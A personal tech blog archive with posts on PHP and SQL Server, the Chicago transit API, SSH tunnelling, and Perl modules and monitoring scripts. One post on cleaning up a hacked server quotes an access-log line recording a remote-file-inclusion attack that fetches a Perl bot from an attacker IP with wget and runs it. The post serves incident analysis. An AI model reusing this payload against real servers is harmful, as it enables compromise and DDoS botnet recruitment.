Recently in Development Category

Adding SQL Server Support in PHP on Linux

| 0 Comments
| | | |

Back in July I outlined a method for establishing a SSH tunnel between Linux and Windows machines. The goal of the connection was to enable a PHP script on a front-end Linux web server access to information stored on the back-end private Windows server running SQL Server.

What I didn't mention at the time was how I enabled PHP support for Microsoft's SQL Server.

The most common deployments of PHP on Linux include support for MySQL or Postgres, depending largely on other factors such has the organization's preference, experience and requirements. Since PHP can be deployed on Windows, there is support for Microsoft's SQL Server. Such support is nontrivial to enable in PHP on Linux. It is however possible:

To enabled SQL Server support in PHP on Linux, the PHP extension that provides said support requires the FreeTDS library to build against. FreeTDS is an open source implementation of C libraries originally marketed by Sybase and Microsoft to enable access to their database servers.

Downloading the source code, building and installing FreeTDS is straightforward:


$ wget \
ftp://ftp.ibiblio.org/pub/Linux/ALPHA/freetds/stable/freetds-stable.tgz
$ gunzip freetds-stable.tgz
$ tar xf freetds-stable
$ cd freetds
$ ./configure
$ make
$ make install

The next step is to build the PHP source code against the FreeTDS libraries to include SQL Server support. This can be done one of two ways; build PHP from scratch or build the specific PHP extension. Since I was working on a server with a preexisting install of PHP, I opted for door number two:

Locate or download the source code for the preexisting version of PHP. Next, copy the mssql extension source code from the PHP source code into a separate php_mssql directory:


$ cp ext/mssql/config.m4 ~/src/php_mssql
$ cp ext/mssql/php_mssql.c ~/src/php_mssql
$ cp ext/mssql/php_mssql.h ~/src/php_mssql

Now build the source code, pointing it to where FreeTDS has been installed:


$ phpize
$ ./configure --with-mssql=/usr/local/freetds
$ make

There should now be a mssql.so file in ~/src/php_mssql/modules/ that can be copied into the existing PHP install. Once copied the last remaining steps are to enable the extension by modify the php.ini file and restarting the Apache HTTP Server.

Additional Information can be found here: Connecting PHP on Linux to MSQL on Windows

Accessing the CTA's API with PHP

| 0 Comments
| | | |

Overview
Last month the City of Chicago arranged for a Open Data Hackaton in which a collection of programmers gathered together to develop and write programs that utilize a new resource, open access to city information.

For my part, I spent the data writing a PHP class file that wraps around the Chicago Transit Authority's web-based application programming interface, enabling access to CTA bus, rail and service information for PHP driven applications. As I've noted in the README file, "this class brings all three APIs together into one object with related methods."

The following in a quick rundown of how to incorporate this new class file into a working PHP application.


Installation
The first step is to download the class.cta.php file from GitHub and save it in a location that the PHP application has read access.

The next step is to include the file using the include (or similar require) function in the PHP application itself:

// Load the class file in our current directory
include_once( 'class.cta.php' );

Once the class file has been loaded, the next step is to instantiate the class:

$transit = new CTA ( 
	'YOUR-TRAIN-API_KEY_HERE', 
	'YOUR-BUS-API-KEY-HERE', false 
);

Notice that initialization of transit includes providing two API keys. API Keys can be requested from the CTA. For an API Key for Train Tracker, use the Train Tracker API Application form. For Bus Tracker, first sign into Bus Tracker, then request an Developer Key under "My Account".1

If no valid API keys are provided the only methods that will return valid information are the Customer Alert functions for system status information. Specificity the two functions statusRoutes and statusAlerts. This is because the Customer Alert API does not require an API key for access.


Execution
To invoke a method simply use the object and related function, providing any additional information as parameters, if required. For example, to get information about all of the bus stops the east-bound route 81 bus makes:

// Get an array result of all stops for an east-bound 81 bus.
$EastBoundStops = $transit->busGetStops( '81', 'East Bound' ));

All methods return an array which can be accessed to retrieve desired information. PHP's print_r or var_dump functions provide insight into all information returned by a specific function:

echo '<pre>';
print_r( $transit->busGetStops( '81', 'East Bound' ));
echo '</pre>';

The output will look something akin to this:

SimpleXMLElement Object
	(
	    [stop] => Array
	        (
	            [0] => SimpleXMLElement Object
	                (
	                    [stpid] => 3751
	                    [stpnm] => 2900 W Lawrence
	                    [lat] => 41.968500785328
	                    [lon] => -87.701137661934
	                )
...
	            [49] => SimpleXMLElement Object
	                (
 	                   [stpid] => 3725
	                    [stpnm] => Milwaukee & Higgins
	                    [lat] => 41.969027266773
	                    [lon] => -87.761798501015
	                )

 	       )

	)

In order to generate the following output listing the location of the Lawrence & Kimball stop:

Lawrence & Kimball (Brown Line)
At 41.968405060961 North and -87.713229060173 West

The following PHP code will provide the latitude and longitude of the Kimball stop, which is also a transfer point to the El's Brown Line:

$EastBoundStops = $transit->busGetStops( '81', 'East Bound' );
foreach( $EastBoundStops as $stop ) {

     if ( preg_match( '/kimball/i', $stop->stpnm )) {
		
          echo $stop->stpnm;
          echo 'At ' .$stop->lat. 'North and ' .$stop->lon. ' West';
		
     }
	
}

Notice that while the list of stops is provided in an array, each element in the array is a SimpleXMLElement object, thus the use of the object syntax for accessing each element.

The train function will allow for the determination of rail information, for example when the next Brown line train will be leaving the Kimball stop. However, while the previous example included a stop id for the route 81 bus at Kimball, the stop id is unique to the route 81 bus and does not translate to the stop id of the Brown line El at Kimball. Therefore, the first step is to locate the relevant GTFS2 data for the Kimball station:

/*	Per the CTA's website, El routes are identified as follows:

	Red = Red Line
	Blue = Blue Line
	Brn = Brown Line
	G = Green Line
	Org = Orange Line
	P = Purple Line
	Pink = Pink Line
	Y = Yellow Line
		
	Which means our Brown line is 'brn' 
*/
$brownStops = $transit->train( '', '', '', 'brn' );
foreach( $brownStops as $stop ) {

	if ( preg_match( '/kimball/i', $stop->staNm )) {
		
		echo "$stop->staNm train is destined for $stop->stpDe ";
		echo "Scheduled to arrive/depart at $stop->arrT";
		
	}
	
}

Which provides output similar to the following:

Kimball train is destined for Service toward Loop
Scheduled to arrive/depart at 20110821 17:17:01

One should note that the Brown line stop at Kimball is the northern end point for the Brown line, which means any trains leaving the station will only be bound in one direction, south, toward the Loop. If the string comparison is changed to 'irving' for the Irving Park station, the output changes to something similar, with trains running in both directions:

Irving Park train is destined for Service toward Kimball
Scheduled to arrive/depart at 20110821 17:19:34

Irving Park train is destined for Service toward Kimball
Scheduled to arrive/depart at 20110821 17:23:13

Irving Park train is destined for Service toward Loop 
Scheduled to arrive/depart at 20110821 17:19:44

Irving Park train is destined for Service toward Kimball 
Scheduled to arrive/depart at 20110821 17:32:19 

In Review
class.cta.php is a single PHP class file that provides access to all three CTA APIs for Bus, Train and Service information. The class implement functions for access to all API methods and returns an array of SimpleXMLElement objects that a PHP developer can use to incorporate real-time information about Chicago's public transit system.

Additional information about the CTA's APIs, including terms of use and how to request API Keys, can be found on the CTA's Developer page.




1 Why two different API Keys, one for train and one for bus information? Due to the evolution of the CTA's API interfaces, there are three distinct APIs, one for Bus, Train and Customer Alerts information. As a result there are three distinct URI endpoints and two distinct API keys.

2 The CTA provides its data based on the Google Transit Feed Specification (GTFS) which is becoming a common format for public transportation agencies to publishing schedules and associated geographic information. The CTA generates and distributes, about once a week, an up-to-date zip compressed collection of files that includes basic agency information, route, transfer and stop locations, and other related service information. Note that ids 0-29999 are bus stops, ids 30000-39999 are train stops and 40000-49999 train stations (parent stops).

Establish and Maintain an SSH Tunnel between Linux and Windows

| 1 Comment
| | | |

The Situation
Over the years, I've worked in numerous computing environments and have come to appreciate heterogeneous systems. In my mind, all system administrators should experience how different platforms solve similar problems, just as all programmers should be exposed to different programming languages.

Of course this means being able to play well with others. Sometimes, that's easier said than done.

A recent project requirement stipulated being able to connect a public web server with a private database system. Not an uncommon requirement, but it did place a hurdle immediately in the way. The web application, developed with the Linux, Apache, MySQL and PHP (LAMP) stack, needed a method to connect to the private database system securely, which, for fun was not MySQL but instead Microsoft's SQL Server.

The Problem
The initial requirement called on connecting to the SQL Server using Microsoft's virtual private network (VPN) solution, Microsoft Point-to-Point Encryption (MPPE). Not impossible, since support for MPPE on any Linux distribution simply requires modifying the Linux kernel and recompiling the kernel in Linux is usually a non-issue.

However, in this case the web application would be running on a basic virtual private server (VPS) and a Linux VPS doesn't run its own kernel. Instead Linux VPSes run on a shared kernel used by all the different virtualized servers running on the same hardware.

Net result, no modification of the Linux kernel would be possible on the VPS.

One alternative to this hurdle would have been to switch from a Linux VPS to a Windows VPS. This would have been technically possible since Apache, MySQL and PHP have viable Windows ports. Alas, the hosting provider in question didn't yet offer Windows VPSes. They would shortly, but couldn't guarantee that their Windows VPS solution would be available in time for this particular project's deadline.

A second alternative could have been to upgrade from a virtualized server to a dedicated server. But that would have added more computing resources than what was required. From a business perspective, the added monthly cost wasn't justifiable. Not when a third alternative existed.

A Workable Solution
VPN is one of those terms that can refer to something generic as well as something very specific1. This distinction setups up alternative number three. The secure network connection requirement would remain, the implementation could simply change2.

Specifically the secure connection would be implemented via SSH instead of via MPPE.

With SSH an encrypted tunnel through an open port in the private network's firewall can be established. This tunnel forwards network traffic from a specified local port to a port on the remote machine, securely.

Most Linux distributions these days install OpenSSH as part of their base system install. OpenSSH is a free and open version of the SSH protocol and includes client and server software. For those distributions that don't install it by default installing OpenSSH is usually a trivial matter via the distribution's package manager.

Windows, on the other-hand, has no such base installation of an SSH implementation. There are a number of free software versions for Windows. For the case at hand, freeSSHD was selected to provide a free, open source version of the SSH server software.

Configuring freeSSHD to enable tunneling requires the following steps:

  1. Click on the "Tunneling" tab
  2. Check to enable port forwarding and apply the change
  3. Click on the "Users" tab
  4. Create or edit a user and enable tunnel access

Once the firewall has been configured to allow SSH traffic on port 22, establishing the tunnel from the Linux client to the Windows server is as simple as typing the following at the Linux command-line:


ssh -f -N -L 127.0.0.1:1433:192.168.1.2:1433 username@example.org

In which ssh will create and send to the background a ssh tunnel (-f option) without executing any remote commands (-N option) that begins at the localhost port 1433 (127.0.0.1:1433) terminates at the remote address and port (192.168.1.2:1433) and authenticates using the remote username at the remote location (the public IP address or domain name for the private network).

But Wait There's More
There is however a minor problem with this SSH tunnel. As described, the establishment of the SSH tunnel is an interactive process. The command needs to be executed and the password for the user provided for authentication. In most cases a simple shell script, executed by cron would solve this minor issue. However, for the sake of security OpenSSH doesn't provide a command-line option for providing passwords.

This authentication step can be managed in one of two ways. One is the use of a key management program such as ssh-agent. The second, more common option is to create a passphrase-less key.

The first step in creating a passphrase-less key is to first generate a private/public key pair>sup>3. In Linux this is done by issuing the command:


ssh-keygen -t rsa

Which generates a private/public key pair based on either the RSA or DSA encryption algorithm, depending on what is provided in the command-line option.

When prompted to enter a passphrase for the securing of the private key simply press enter. To confirm the empty passphrase simply press enter again.

The next step, after copying the public key onto the Windows server, is to enable the use of the public key for authentication. In freeSSHD the steps are:

  1. Click on the "Users" tab
  2. Select a user and click on "Change"
  3. Select "Public Key" from the "Authorization" drop-down
  4. Click on "OK" to save changes to users
  5. Next click on the "Authentication" tab
  6. Using the browse button, select the directory with the users public key are kept
  7. Enable public-key authentication by choosing the "Allowed" button under "Public-Key Authentication"
  8. Click on "OK" to save the changes to authentication

With the passphrase-less keys in place, the last step is to automate the tunnel itself. In this case, instead of a shell script, I opted to use program called autossh.

autossh is a program that can start a copy of ssh and monitor the connection, restarting it when necessary. All autossh needs to know is what local port to monitor, so our one-time initial startup of ssh tunnel looks similar to the previous example, but with autossh and the addition of the -M option


autossh -M 1433 -f -N -L 127.0.0.1:1433:192.168.1.2:1433 
username@example.org




[1] This means alas, it is also one of those terms that can cause confusion, especially between technical and non-technical people, if not defined at the outset.

[2] This is one of those places where knowledge of different solutions solving a similar problem becomes handy.

[3] For user authentication SSH can either be password-based or key-based. In key-based authentication, SSH uses public-key cryptography where the public key is distributed to identify the owner of the matching private key. The passphase is in this case is used to authenticate access to the private key.

Web Development: Before and After the Client

| 0 Comments
| | | |

First published: 17th of Dec 2010 for Orbit Media Studios

For someone looking for a web design firm, how a website is developed might seem meaningless. Who cares, so long as it works?

Yet how well a website works can be measured in part by the costs associated with it. The direct cost is the total price for the initial project. The indirect costs consist of secondary expenses related to ongoing marketing and support during the lifetime of the website.

At Orbit we have two development processes. Both are designed to reduce costs and improve quality. The first is an internal process that starts before the client ever arrives. The second process begins at the first client meeting as we discover the project's specific requirements.

Internal Development
First, what do we mean by develop? Development usually refers to the programming of the website, whereas design refers to the look and feel.

With development, we need to consider a few basic questions. What features are required to make an ecommerce website work, for example? Regardless of the item being sold or the company selling the item, the basic logic can be described in a few steps:

  1. A customer selects an item to purchase
  2. The selected item is placed into a shopping cart
  3. The customer decides to checkout, continue shopping or abandon their cart
  4. To checkout, the customer initiates the process of purchasing what is in their cart
  5. The store presents a total bill for the item(s) desired by the customer
  6. The customer presents a method of payment
  7. The payment is verified and the transaction is completed

To be sure, this purchasing feature isn't complete and plenty of questions can remain. However, this generalized logic provides a starting point.

This is where web development at Orbit begins, identifying basic features of a potential website.

Developer Day
Roughly once a month, all of Orbit's developers spend the day working on such questions, analyzing and programing with various sandboxes.

A sandbox is simply a generic website in which the development team can create, test and improve different features and find the best approach for virtually any type of website. It's a play area for programmers.

The focus is on breaking down the feature into workable steps and rapidly building them. In doing so we consider what has worked for clients in the past along with growing trends such as social media integration.

Each Developer Day represents the repeating of a cycle of planning, analyzing, coding and acceptance testing in order to get the feature built right.

But, as we mentioned, plenty of questions can remain. Not all features will work perfectly "out of the box" for all clients.

Developing with the Client
This brings us to the second process of web development at Orbit: developing with the client. Now the concern is on completion of a particular website. Thus the focus for the developer changes from generalized concepts to specific implementation.

But before a developer can customize the code for a client, a new process of discovery and planning must begin. The phases of this process break down into the following, with direct client involvement at each step:

  1. A Kick-Off Meeting where initial questions about goals and scope are answered
  2. Discovery of the layout and flow for the proposed website
  3. Designing the look of the website and expressing the client's brand
  4. Development, implementing and testing
  5. Deploing the website for public use

In this sequential development process each step follows from the last. There is a specific beginning and ending. One step cannot be started until the previous step is completed and approved.

The Big Payoff
Understanding the development process for a custom website is important. How many hours a developer works on a client's website and the dependability of the underlying code affects its ultimate cost.

Both direct and indirect costs impact the client's ability to market their website and can limit the overall return of the website.

Rather than starting from scratch, Orbit takes the pieces we have built and improved earlier and applies them to the client's project, customizing the features to the needs of the website. In doing so we execute different development processes in order to keep our client's costs manageable while adding value to their business.

Damn Script Kiddies, Get Off My Lawn!

| 6 Comments
| | | |

This should be a post about how entertaining the Chicago edition of w00tstock was1 or about Steve Jobs' WWDC Keynote2 or about the Blackhawks winning the Stanley Cup3 or any number of other things. Instead this post it about cleaning up after some script kiddie who decided to try to use a server that does not belong to them for their own personal use.

RedEye0611Hawks580.jpg
See, on Monday last, I discovered, after an automated notice of high computing load, a process identifying itself as "/usr/sbin/apache/log" which had been running for some 30+ hours. Obviously, no Apache log rotation should take that long. Moreover, the log rotation program commonly found with the Apache Web Server is known as rotatelog. A quick directory listing confirmed that no such program or directory existed at "/usr/sbin/apache/log"

A Google search for that path resulted in a number of pages warning of a possible system compromise and suggested a review of files in the "/var/tmp" and "/tmp" directories for anything weird.

Alas, anything weird is a bit vague and considering that both temporary directories are common placeholders for random files of any number of system users or programs it took me a few passes to realize that in this case that "anything weird" would be any thing executable since any proper executable would reside elsewhere on a Unix-based filesystem.

An extended listing of contents resulted in the the identification of the culprit, a Perl script called, pxconfig residing in the root tmp directory.

Luckily no evidence indicated a greater incursion, such as a rootkit being installed, thus disabling the script was a simple matter of using root's superuser status to kill the process and remove the privileges of script file from executing.

Another Google search, using some of the script's code, resulted in the discovery of an analysis of a similar Perlbot, the main difference being that the script I had discovered looked to have been modified with the sole purpose of working in coordination with other compromised systems for overloading a server with resource requests (DDoS) and seemed to contain no code to propagate itself.

So after disabling the offending script, I set about trying to discover how it managed to get itself installed in the first place. This blog posting suggested a possible point of entry and indeed after trying a couple of different search patterns on the Apache access logs I located the point of entry:

access_log.5.gz:80.37.xxx.xx - -
[01/Jun/2009:00:01:54 -0500] "GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]
=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://81.56.xxx.xxx/cmd.gif?&cmd=cd%20/tmp;
wget%20http://81.56.xxx.xxx/d.pl;perl%20d.pl;echo%20YYY;echo| HTTP/1.1" 200 434 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Notice in the GET request a GIF file being uploaded and a series of shell commands. Well the GIF file is no doubt corrupt, designed to take advantage of any number of known security vulnerabilities with the GD library resulting in a buffer overflow that in turn allows the arbitrary execution of the commands. Those commands change access to the "/tmp" directory, use wget to download a perl file and then execute said perl file. That file no doubt downloads yet another script name pxconfig, executes that second script and removes itself.

Moral of the story? Keep the system up-to-date, restrict all points where files can be uploaded, keep a close eye on what's running and Google is your friend.

Damn kids these days!



1 Quick Review: Very entertaining, would have liked a chance to get Bill Amend's autograph on a FoxTrot Collection.

2 Yes, I still plan on upgrading my iPhone from a "3G" to the new "4", no I'm not surprised Apple has renamed their mobile OS.

3 Time to retake my picture with The Cup.

Viddler API via Perl

| 0 Comments
| | | |

Recently, while doing some consulting work, I started working with an new online video platform called Viddler. Much like YouTube, Viddler is a web application, built around videos, that allows one to upload and share on the web.

However, unlike YouTube, Viddler also provides a great deal of features for customization, from the skinning of the video player to the integration of the Viddler platform into customized web applications. The obvious advantage here for a business or organization is the ability to provide video content wrapped within their own branding or application without the expense of building and managing the huge computing infrastructure required for bandwidth and data storage.

For example, checkout the MIT Tech TV, a video-sharing site for the MIT community built using Viddler.

Alas, while there is plenty of support for the Viddler Application Programming Interface via PHP, which is what my consulting work is based in, the support for Perl is quite anemic.

To help rectify this dire situation, in my free time over the last week or so, I've been working on an Perl module that wraps around Viddler's API. The goal here is not only to provide a basic how-to, but a quick method for integrating Perl-based applications with Viddler. As such, I plan on having something more formal to submit, not only to Viddler's Project Directory, but to CPAN as well, in the near future.

With that in mind, here's the basic layout with a few implemented methods for guidance and testing:

package Viddler;

use strict;
use warnings;

use LWP::Simple;
use XML::Simple;

our $VERSION = "0.01";

### To Do
#
# Complete support of all API methods
# Add SSL option for methods such as users_auth
# Validation/Error Handling of parameters/results 
#
#### 

=head1 NAME

Viddler - An encapsulation of the Viddler video platform in Perl

=head1 SYNOPSIS

use Viddler;
my $videos = new Viddler( apiKey => $apiKey, 
			  username => $username,
			  password => $passwd,
			);

print "API Version: " .$videos->api_getInfo(). "\n";

=head1 DESCRIPTION

This is an object-oriented library which focuses on pro diving Perl 
specific methods for accessing the Viddler video service via their 
API, as documented at: 
http://developers.viddler.com/documentation/api/

=head2 Methods

=head3 new

my $video = Viddler->new( apikey => $key, 
			  username => $username, 
			  password => $passwd );

Instantiates an object which established the basic connection to 
the API, including requesting and setting session id.

=cut

# The constructor of an object is called new() by convention.  
   
sub new {

	my ( $class, %args ) = @_;
	my $new = bless {
		_apiURL => 'http://api.viddler.com/rest/v1/',
		_sessionID => undef,
		_record_token => undef,
		%args
	}, $class;

	# Get a sessionid
	$new->users_auth;

	return $new;

}

=head3 users_auth

Gets and sets a sessionid for an authenticated Viddler account.
Returned sessionid is valid for 5 minutes (may change in the
future). Every method request which contains valid sessionid,
renews its validity time.

$video->users_auth;

No required parameters. Will use username and password defined
at object's creation

Additional options parameters include: 

* get_record_token: If set to response will also include
recordToken

Returns 0 ( false ) if unsucessful and 1 ( true ) if sucessful

=cut

sub users_auth {

	my ( $self, $get_record_token ) = @_;

	my $xml = new XML::Simple;
	my $content = get $self->{_apiURL}. 
		"?method=viddler.users.auth&api_key="
		.$self->{apiKey}. "&user=" .$self->{username}. 
		"&password=" .$self->{password}. 
		"get_record_token=" .$get_record_token;
	my $results = $xml->XMLin( $content );
	$self->{_sessionID} = $results->{'sessionid'};
	
	if ( defined $results->{'get_record_token'} ) {

		$self->{_recordToken} = $results->{'record_toaken'};

	}

	if ( defined ( $self->{_sessionID} )) {

		return 1;

	} else {

		return 0;

	}

}

=head3 api_getInfo

Gets and returns the current version of the Viddler API.

$video->api_getInfo;

Returns current API version as a string

=cut

sub api_getInfo {

	my ( $self ) = @_;

	my $xml = new XML::Simple;
	my $content = get $self->{_apiURL}. 
		"?method=viddler.api.getInfo&api_key=" 
		.$self->{apiKey};
	my $results = $xml->XMLin( $content );
	return $results->{'version'};

}

=head3 videos_search

Gets and returns results of a search of Viddler videos and people.

$video->videos_search( $type, $query, $page, $per_page );

Requires the following parameters:

* type: The type of search (e.g. "myvideos", 
"friendsvideos", "allvideos", "relevant", "recent", "popular",
 "timedtags", "globaltags". (The "timedtags" and "globetags"
sorting argument should be used in conjunction with an actual 
tag being given for the query argument.))

* query: What to search for (e.g. "iPhone", "Pennsylvania", or 
"Windows XP")

Additional options parameters include: 

* page: The "page number" of results to retrieve (e.g. 1, 2, 3).

* per_page: The number of results to retrieve per page (maximum 
100). If not specified, the default value equals 20.

Returns a hash of an array of search results

=cut

sub videos_search( $$ ) {

	my ( $self, $type, $query, $page, $per_page ) = @_;

	my $xml = new XML::Simple;
	my $content = get $self->{_apiURL}. 
		"?method=viddler.videos.search&api_key=" 
		.$self->{apiKey}. "&type=" .$type. 
		"&query=" .$query. "&page=" .$page. 
		"&per_age=" .$per_page. "&sessionid=" 
		.$self->{_sessionID};
	my $results = $xml->XMLin( $content );
	return $results;

}

=head3 videos_getByUser

Gets and returns a lists of all videos that were uploaded by the 
specified user.

$video->videos_getByUser( $user, page, $per_page, $tags, $sort );

Requires the following parameters:

* user: The chosen Viddler user name. You can provide multiple 
coma separated viddler usernames

Additional options parameters include: 

* page: The of results to retrieve (e.g. 1, 2, 3).

* per_page: The number of results to retrieve per page (maximum 
100). If not specified, the default value equals 20.

* tags: The tags you would like to filter your query by.

* sort: How you would like to sort your query (views-asc, 
views-desc, uploaded-asc, uploaded-desc)

Returns a hash of an array of search results

=cut

sub videos_getByUser( $ ) {

	my ( $self, $user, $per_page, $page, $tags, $sort ) = @_;

	my $xml = new XML::Simple;
	my $content = get $self->{_apiURL}. 
		"?method=viddler.videos.getByUser&api_key=" 
		.$self->{apiKey}. "&sessionid=" 
		.$self->{_sessionID}. "&user=" .$user. 
		"&page=" .$page. "&per_age=" .$per_page. 
		"&tags=" .$tags. "&sort=" .$sort;
	my $results = $xml->XMLin( $content );
	return $results;

}

=head1 AUTHOR

Paul Weinstein pdw [at] weinstein [dot] org

=cut

1;
__END__

And here's a little code to test the demo package:

#!/usr/bin/perl -T

use strict;
use warnings;

use Data::Dumper;
use Viddler;

my $videos = new Viddler( apiKey => '1234567890abcdefghij', 
			  username => 'username',
			  password => 'password',
			);

print "API Version: " .$videos->api_getInfo(). "\n";

my $searchResults = $videos->videos_getByUser( "username", 
						"", "", 
						"test", "" );
print Dumper( $searchResults );

Comments, suggestions or corrections are quite welcomed.

Google's Chrome OS in 2010

| 0 Comments
| | | |

First published: 20th of November 2009 for Technorati

Yesterday Google hosted a small technical introduction to its new Chrome Operating System (OS), which is scheduled for release on new netbooks by the end of 2010.

Google's vision for Chrome is to build on the concept of the Web as a ubiquitous computing platform. As outlined by Sundar Pichai, Google's Vice President of Product Management, "in Chrome OS, every application is a web application." Which means at the heart of everything is Google's Chrome Web Browser, modified to run all on its own, "It's just a browser with a few modifications. And all data in Chrome OS is in the cloud."

That in turn allows Google to provide a quick, nimble system that can "be blazingly fast, basically instant-on." As demonstrated on the test system, built on a modified Linux kernel, went from power-on to surfing the Web in 10 seconds.

In essence, Google Chrome is a cross between Google's cellphone software Android, which is also hosted on the Linux kernel, and the Chrome browser. However, unlike Android, which is built on a modified Java platform for third-party applications to be built and run on, Chrome OS is built to run today's rich web applications built on AJAX as well as tomorrow's web applications built around the draft HTML5 standard.

But what does this mean for Microsoft and Apple? While Google's development of their own operating system is indeed a direct challenge to Microsoft's bread and butter family of Windows, Chrome OS isn't better than Microsoft Windows product or Apple's Mac OS X. Nor is Google's OS even focusing on the traditional tasks of managing the interface between the local hardware and user.

Instead, Google's operating system is about simplifying and enhancing access to applications online. Not so much a replacement of current personal computers, but an alternative to getting online and accessing applications such as Google Docs or Twitter.

Anything that can be done on any standard Web browser on Windows, Mac and Linux can be done on Chrome which means Google's soon-to-be operating system is designed to leverage the growing collection of service-oriented software that can be found online, including, of course, Google's own suite of applications.

The trick for Google now is not just in implementation, but also adoption. Building on the growing trend of netbooks helps, but network computing itself is hardly a new concept.

A Stepped Up Remote Apache Monitor in Perl

| 0 Comments
| | | |

Back in September I outline a simple Perl script to remotely monitor the status of various web servers I manage and report on any failures. One shortcoming of the script is that it has no memory of the previous state of the websites listed for polling. Thus, once a site fails, the script will continuously report on the failure until resolved.

For some, this might be just fine, a simple repetitive reminder until corrected. For others however, this might not be ideal. If, for example, the problem is non-trivial to solve, the last thing one needs is a nagging every few minutes that the issue has yet to be resolved.

I for one am all for notification without excessive nagging.

The obvious answer to this dilemma is to store the previous state of the server such that it can be used to test against the currently state; if the state of the server has changed, a notification gets sent. Thus one straightforward notification that something has changed.

As a bonus, by reporting on the change of state, the script will now report on when the server has come back online as well as when it has failed. This simple change eliminates what would have been a manual process previously; notifying stakeholders that the issue has been resolved.

Since the Perl script is evoked by cron on a regular basis and terminates once polling is complete, the "current" state of a site will need to be store in secondary memory, i.e. on disk, for future comparison. This is pretty straightforward in Perl:


sub logState ($$$) {

	my ( $host, $state, $time ) = @_;

	# Create a filehandle on our log file
	my $fh = FileHandle->new(">> $fileLoc");
	if (defined $fh) {

	        # Print to file the necessary information 
                # delimited with a colon
		print $fh "$host:$state:" .$time->datetime. "\n";
		$fh->close;

 	}
}

With a new Filehandle object the script opens the file previously assigned to the $fileLoc variable for appending (the '>>' immediately prior to the variable denotes write by appending).

If a Filehandle object has been successfully created, the next step is to write a line to the file with the information necessary for the next iteration of the monitor script, specifically the host information and its current state.

Note that each line (\n) in the file will denote information about a specific site and that the related information is separated by a colon (:). This will be pertinent later in the code, reading of the log file at the next scheduled execution of the monitor script:


# Our array of polling sites' previous state
my @hostStates = ();

# Populate said array with information from log file
my $fh = FileHandle->new("< $fileLoc");
while ( <$fh> ) {

	my( $line ) = $_;
	chomp( $line );
	push ( @hostStates, $line );	

}
$fh->close;

In this bit of code the goal is to get the previously logged state of each site and populate an array with the information. At the moment how each record is delimited isn't of concern, but simply that each line is information relating to a specific site and gets its own node in the array.

Note, since the objective here is to simply read the log file the "<" is used by the filehandle to denote that the file is "read-only" and not "append".

Once the polling of a specific site occurs, the first item of concern is determining the site's previous state. For that the following bit of code is put to use:


sub getPreviousState ($) {

	my ( $host ) = @_;

	# For each node in the array do the following
	foreach ( @hostStates ) {

		my( $line ) = $_;
		# Break up the information 
                # using our delimiter, the colon
		my ($domain, $state, $time) = split(/:/, $line, 3);

		# If we find our site return the previous state 
		if ( $domain eq $host ) {
			return $state;
		}

 	}

}

In this function each element in the array is broken down to relevant information using the split function, which delimits the record by a given character, the colon. From here it is a simple matter of testing the two states, the previous and current state before rolling into the notification process.

The complete, improved remote monitor:


#!/usr/bin/perl
use strict;
use FileHandle;

use Time::Piece;
use LWP::UserAgent;
use Net::Ping;
use Net::Twitter::Lite;

### Start Global Settings ###

my $fileLoc = "/var/log/state.txt";
my @hosts = ( "pdw.weinstein.org", "www.weinstein.org" );

### End Global Settings ###

# Our array of polling sites' previous state
my @hostStates = ();

# Populate said array with information from log file
my $fh = FileHandle->new("< $fileLoc");
while ( <$fh> ) {

	my( $line ) = $_;
	chomp( $line );
	push ( @hostStates, $line );

}
$fh->close;

# Clear out the file by writing anew
my $fh = FileHandle->new("> $fileLoc");
$fh->close;

foreach my $host ( @hosts ) {

	my $previousState = getPreviousState( $host );

	my $url = "http://$host";
	my $ua = LWP::UserAgent->new;
	my $response = $ua->get( $url );

	my $currentState = $response->code;
	my $time = localtime;

	# If states are not equal we need to notify someone
	if ( $previousState ne $currentState ) { 

		# Do we have an status code?
		if ( $response->code ) {

			reportError("$host reports
			$response->message.\n");

		} else {

		# HTTP is not responding, 
                # is it the network connection down?
		my $p = Net::Ping->new("icmp");
		if ( $p->ping( $host, 2 )) {

			reportError ( "$host is responding, 
			     but Apache is not.\n" );

		} else {

			reportError ( "$host is unreachable.\n" );

		}

	}

	# Not done yet, we need to log 
        # the current state for future use
	logState( $host, $currentState, $time )

}

sub reportError ($) {

	my ( $msg ) = @_;
	my $nt = Net::Twitter::Lite->new(
		username => $username, 
		password => $pasword );

	my $result = eval { $nt->update( $msg ) };

	if ( !$result ) {

		# Twitter has failed us,
		# need to get the word out still...
		smsEmail ( $msg );

	}

}

sub smsEmail ($) {

	my ( $msg ) = @_;
	my $to = "7735551234\@txt.exaple.org";
	my $from = "pdw\@weinstein.org";
	my $subject = "Service Notification";

	my $sendmail = '/usr/lib/sendmail';
	open(MAIL, "|$sendmail -oi -t");
		print MAIL "From: $from\n";
		print MAIL "To: $to\n";
		print MAIL "Subject: $subject\n\n";
 		print MAIL $msg;
	close( MAIL );

}

sub logState ($$$) {

	my ( $host, $state, $time ) = @_;

	# Create a filehandle on our log file
	my $fh = FileHandle->new(">> $fileLoc");
	if (defined $fh) {

	        # Print to file the necessary information,
                # delimited with a colon
		print $fh "$host:$state:" .$time->datetime. "\n";
		$fh->close;
 	}
}

sub getPreviousState ($) {

	my ( $host ) = @_;

	# For each node in the array do the following
	foreach ( @hostStates ) {

		my( $line ) = $_;
		# Break up the information using our delimiter, 
                # the colon
		my ($domain, $state, $time) = split(/:/, $line, 3);

		# If we find our site return the previous state
		if ( $domain eq $host ) {

			return $state;

		}

 	}

}

Happy Birthday Apache (Software Foundation)

| 0 Comments
| | | |

First published: 3rd of November 2009 for Technorati

 

 

(Photo from Flickr user jaaronfarr)


This week the Apache Software Foundation (ASF) is holding its annual US conference in Northern California for all things Apache. As part of the get together conference attendees, as well as those elsewhere this week, are invited to join in celebrating the 10th anniversary of The Apache Software Foundation.

Ah, I hear confusion in your voice, didn't Apache celebrate its 10th anniversary a couple of years ago?

Indeed the Apache Web Server has already celebrated its tenth birthday, but just as the Apache Web Server evolved from an ad hoc collection of software patches for the NCSA's web server HTTPd, the Apache Software Foundation is a registered non-for-profit organization that evolved from the loose affiliation of web developers and administrators who first submitted and organized those patches in the first place.

Big deal? Well, yes - it is a bit deal. See the Apache Software Foundation is a decentralized community of developers that oversee the development of Apache HTTP Server along with some 65 additional leading Open Source projects.

